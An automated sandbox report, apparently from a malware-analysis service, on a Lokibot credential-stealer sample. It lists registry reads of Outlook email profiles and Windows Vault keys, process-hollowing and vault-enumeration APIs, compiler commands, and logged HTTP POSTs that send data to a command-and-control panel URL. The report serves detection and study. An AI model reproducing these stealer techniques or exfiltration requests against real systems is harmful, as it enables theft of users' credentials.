HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_USERS\S-1-5-18 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\.DEFAULT\Environment HKEY_USERS\.DEFAULT\Volatile Environment HKEY_USERS\.DEFAULT\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe
Read Keys
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-us HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000409 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\AppCompat\RaiseDefaultAuthnLevel HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\DefaultAccessPermission HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00000134-0000-0000-C000-000000000046}\ProxyStubClsid32\(Default) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\NdrOleExtDLL HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\Extensions\RemoteRpcDll HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\2DC8850A HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\00471e98b7a362469ed97e3915fd4111\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\10b0e4d6eb1de34dabd532a0806a0fec\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\192e64c97bf3a54488a039619c763627\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\32a3dc9c400a4b448b60ab7fe553a392\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\43e0bb79f0f2d84db98ff4f730d23d24\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\6a50d9bd87f9a8478751861a1591a6c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7760e21103136b47946c9c80fa097f15\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\7d19c9e894f20d4780a31c9a9f17da11\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\818ecc2f310b344f807e8af5dc013189\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Email HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\{D9734F19-8CFB-411D-BC59-833E334FCB5E}\Calendar Summary\Email HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\LanmanWorkstation\Parameters\RpcCacheTimeout HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
Write Keys
Nothing to display
Delete Keys
Nothing to display
Mutexes
D448845E628773E4A9A809DA
Resolved APIs
advapi32.dll.RegOpenKeyExW advapi32.dll.RegQueryInfoKeyW advapi32.dll.RegEnumKeyExW advapi32.dll.RegEnumValueW advapi32.dll.RegCloseKey advapi32.dll.RegQueryValueExW kernel32.dll.FlsAlloc kernel32.dll.FlsFree kernel32.dll.FlsGetValue kernel32.dll.FlsSetValue kernel32.dll.InitializeCriticalSectionEx kernel32.dll.CreateEventExW kernel32.dll.CreateSemaphoreExW kernel32.dll.SetThreadStackGuarantee kernel32.dll.CreateThreadpoolTimer kernel32.dll.SetThreadpoolTimer kernel32.dll.WaitForThreadpoolTimerCallbacks kernel32.dll.CloseThreadpoolTimer kernel32.dll.CreateThreadpoolWait kernel32.dll.SetThreadpoolWait kernel32.dll.CloseThreadpoolWait kernel32.dll.FlushProcessWriteBuffers kernel32.dll.FreeLibraryWhenCallbackReturns kernel32.dll.GetCurrentProcessorNumber kernel32.dll.GetLogicalProcessorInformation kernel32.dll.CreateSymbolicLinkW kernel32.dll.EnumSystemLocalesEx kernel32.dll.CompareStringEx kernel32.dll.GetDateFormatEx kernel32.dll.GetLocaleInfoEx kernel32.dll.GetTimeFormatEx kernel32.dll.GetUserDefaultLocaleName kernel32.dll.IsValidLocaleName kernel32.dll.LCMapStringEx kernel32.dll.GetTickCount64 advapi32.dll.EventRegister mscoree.dll.#142 mscoreei.dll.RegisterShimImplCallback mscoreei.dll.OnShimDllMainCalled mscoreei.dll._CorExeMain shlwapi.dll.UrlIsW version.dll.GetFileVersionInfoSizeW version.dll.GetFileVersionInfoW version.dll.VerQueryValueW clr.dll.SetRuntimeInfo clr.dll._CorExeMain mscoree.dll.CreateConfigStream mscoreei.dll.CreateConfigStream kernel32.dll.GetNumaHighestNodeNumber kernel32.dll.GetSystemWindowsDirectoryW advapi32.dll.AllocateAndInitializeSid advapi32.dll.OpenProcessToken advapi32.dll.GetTokenInformation advapi32.dll.InitializeAcl advapi32.dll.AddAccessAllowedAce advapi32.dll.FreeSid kernel32.dll.AddSIDToBoundaryDescriptor kernel32.dll.CreateBoundaryDescriptorW kernel32.dll.CreatePrivateNamespaceW kernel32.dll.OpenPrivateNamespaceW kernel32.dll.DeleteBoundaryDescriptor kernel32.dll.WerRegisterRuntimeExceptionModule kernel32.dll.RaiseException mscoree.dll.#24 mscoreei.dll.#24 ntdll.dll.NtSetSystemInformation kernel32.dll.SortGetHandle kernel32.dll.SortCloseHandle kernel32.dll.GetNativeSystemInfo ole32.dll.CoInitializeEx cryptbase.dll.SystemFunction036 ole32.dll.CoGetContextToken clrjit.dll.sxsJitStartup clrjit.dll.getJit kernel32.dll.LocaleNameToLCID kernel32.dll.LCIDToLocaleName kernel32.dll.GetUserPreferredUILanguages nlssorting.dll.SortGetHandle nlssorting.dll.SortCloseHandle kernel32.dll.CloseHandle kernel32.dll.GetCurrentProcess kernel32.dll.GetTempPathW ole32.dll.CoTaskMemAlloc ole32.dll.CoTaskMemFree kernel32.dll.GetFullPathNameW cryptsp.dll.CryptGetDefaultProviderW cryptsp.dll.CryptAcquireContextW cryptsp.dll.CryptGenRandom kernel32.dll.SetThreadErrorMode kernel32.dll.CreateFileW kernel32.dll.GetFileType kernel32.dll.WriteFile kernel32.dll.GetFileAttributesExW kernel32.dll.GetCurrentDirectoryW kernel32.dll.GetStdHandle kernel32.dll.GetEnvironmentStrings kernel32.dll.GetEnvironmentStringsW kernel32.dll.FreeEnvironmentStringsW kernel32.dll.GetACP kernel32.dll.UnmapViewOfFile kernel32.dll.CreateProcessW kernel32.dll.DuplicateHandle kernel32.dll.GetExitCodeProcess kernel32.dll.GetFileSize kernel32.dll.ReadFile kernel32.dll.DeleteFileW mscoree.dll.GetProcessExecutableHeap mscoreei.dll.GetProcessExecutableHeap kernel32.dll.FindResourceA kernel32.dll.SizeofResource kernel32.dll.LoadResource kernel32.dll.LockResource gdiplus.dll.GdiplusStartup kernel32.dll.IsProcessorFeaturePresent user32.dll.GetWindowInfo user32.dll.GetAncestor user32.dll.GetMonitorInfoA user32.dll.EnumDisplayMonitors user32.dll.EnumDisplayDevicesA gdi32.dll.ExtTextOutW gdi32.dll.GdiIsMetaPrintDC gdiplus.dll.GdipCreateBitmapFromStream windowscodecs.dll.DllGetClassObject kernel32.dll.WerRegisterMemoryBlock gdiplus.dll.GdipImageForceValidation gdiplus.dll.GdipGetImageRawFormat gdiplus.dll.GdipGetImageWidth gdiplus.dll.GdipGetImageHeight gdiplus.dll.GdipBitmapGetPixel shell32.dll.SHGetFolderPathW kernel32.dll.CompareStringOrdinal clr.dll.CreateAssemblyNameObject ole32.dll.CoGetObjectContext sechost.dll.LookupAccountNameLocalW advapi32.dll.LookupAccountSidW sechost.dll.LookupAccountSidLocalW ole32.dll.NdrOleInitializeExtension ole32.dll.CoGetClassObject ole32.dll.CoGetMarshalSizeMax ole32.dll.CoMarshalInterface ole32.dll.CoUnmarshalInterface ole32.dll.StringFromIID ole32.dll.CoGetPSClsid ole32.dll.CoCreateInstance ole32.dll.CoReleaseMarshalData ole32.dll.DcomChannelSetHResult rpcrtremote.dll.I_RpcExtInitializeExtensionPoint clr.dll.CreateAssemblyEnum kernel32.dll.ResolveLocaleName kernel32.dll.LoadLibraryA kernel32.dll.WideCharToMultiByte kernel32.dll.GetProcAddress kernel32.dll.GetModuleHandleA advapi32.dll.LookupPrivilegeValueW advapi32.dll.AdjustTokenPrivileges ntdll.dll.NtQuerySystemInformation kernel32.dll.CreateProcessA kernel32.dll.GetThreadContext kernel32.dll.Wow64GetThreadContext kernel32.dll.SetThreadContext kernel32.dll.Wow64SetThreadContext kernel32.dll.ReadProcessMemory kernel32.dll.WriteProcessMemory ntdll.dll.NtUnmapViewOfSection kernel32.dll.VirtualAllocEx kernel32.dll.ResumeThread ole32.dll.CoUninitialize oleaut32.dll.#500 advapi32.dll.EventUnregister gdiplus.dll.GdipDisposeImage cryptsp.dll.CryptReleaseContext kernel32.dll.CreateActCtxW kernel32.dll.AddRefActCtx kernel32.dll.ReleaseActCtx kernel32.dll.ActivateActCtx kernel32.dll.DeactivateActCtx kernel32.dll.GetCurrentActCtx kernel32.dll.QueryActCtxW kernel32.dll.GetProcessPreferredUILanguages kernel32.dll.GetUserDefaultUILanguage version.dll.GetFileVersionInfoSizeA version.dll.GetFileVersionInfoA version.dll.VerQueryValueA alink.dll.CreateALink mscoree.dll.CLRCreateInstance mscoreei.dll.CLRCreateInstance cryptsp.dll.CryptAcquireContextA cryptsp.dll.CryptCreateHash cryptsp.dll.CryptHashData cryptsp.dll.CryptGetHashParam cryptsp.dll.CryptDestroyHash clr.dll.DllGetClassObjectInternal clr.dll.StrongNameTokenFromPublicKey clr.dll.StrongNameFreeBuffer clr.dll.CompareAssemblyIdentityWithConfig clr.dll.CreateAssemblyConfigCookie clr.dll.DestroyAssemblyConfigCookie cryptsp.dll.CryptImportKey cryptsp.dll.CryptExportKey cryptsp.dll.CryptDestroyKey mscorpehost.dll.InitializeSxS mscorpehost.dll.CreateICeeFileGen mscorpehost.dll.DestroyICeeFileGen ole32.dll.CoCreateGuid diasymreader.dll.DllGetClassObject rpcrt4.dll.UuidCreate kernel32.dll.NlsGetCacheUpdateCount ole32.dll.CreateStreamOnHGlobal mscoree.dll.CorExitProcess mscoreei.dll.CorExitProcess vaultcli.dll.VaultEnumerateItems vaultcli.dll.VaultEnumerateVaults vaultcli.dll.VaultFree vaultcli.dll.VaultGetItem vaultcli.dll.VaultOpenVault vaultcli.dll.VaultCloseVault netapi32.dll.NetUserGetInfo cryptsp.dll.CryptSetKeyParam cryptsp.dll.CryptDecrypt
Execute Commands
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Seven01\AppData\Local\Temp\ssyb3ng2.cmdline" "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Seven01\AppData\Local\Temp\RESA661.tmp" "c:\Users\Seven01\AppData\Local\Temp\CSC322517D57E1C4C98B6C2462FF1F8FDB.TMP" C:\Windows\system32\lsass.exe
Started Services
VaultSvc
Created Services
Nothing to display
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven06_64 | Seven06_64 | VirtualBox | 2018-06-25 21:39:47 | 2018-06-25 21:43:03 | 196 |
2 HTTP Request(s) detected
http://abatii.web.id/apaci/Panel/five/fre.php
- Hostname: abatii.web.id
- IP Address: 10.1.26.180
- Port: 80
- Count: 2
POST /apaci/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: abatii.web.id Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DABC2C1C Content-Length: 192 Connection: close
http://abatii.web.id/apaci/Panel/five/fre.php
- Hostname: abatii.web.id
- IP Address: 10.1.26.180
- Port: 80
- Count: 12
POST /apaci/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: abatii.web.id Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DABC2C1C Content-Length: 165 Connection: close
Detected family: #Lokibot
TheSystem Itself @ 2018-06-25 21:48:04
#infosec #automation
TheSystem Itself @ 2018-06-25 21:42:25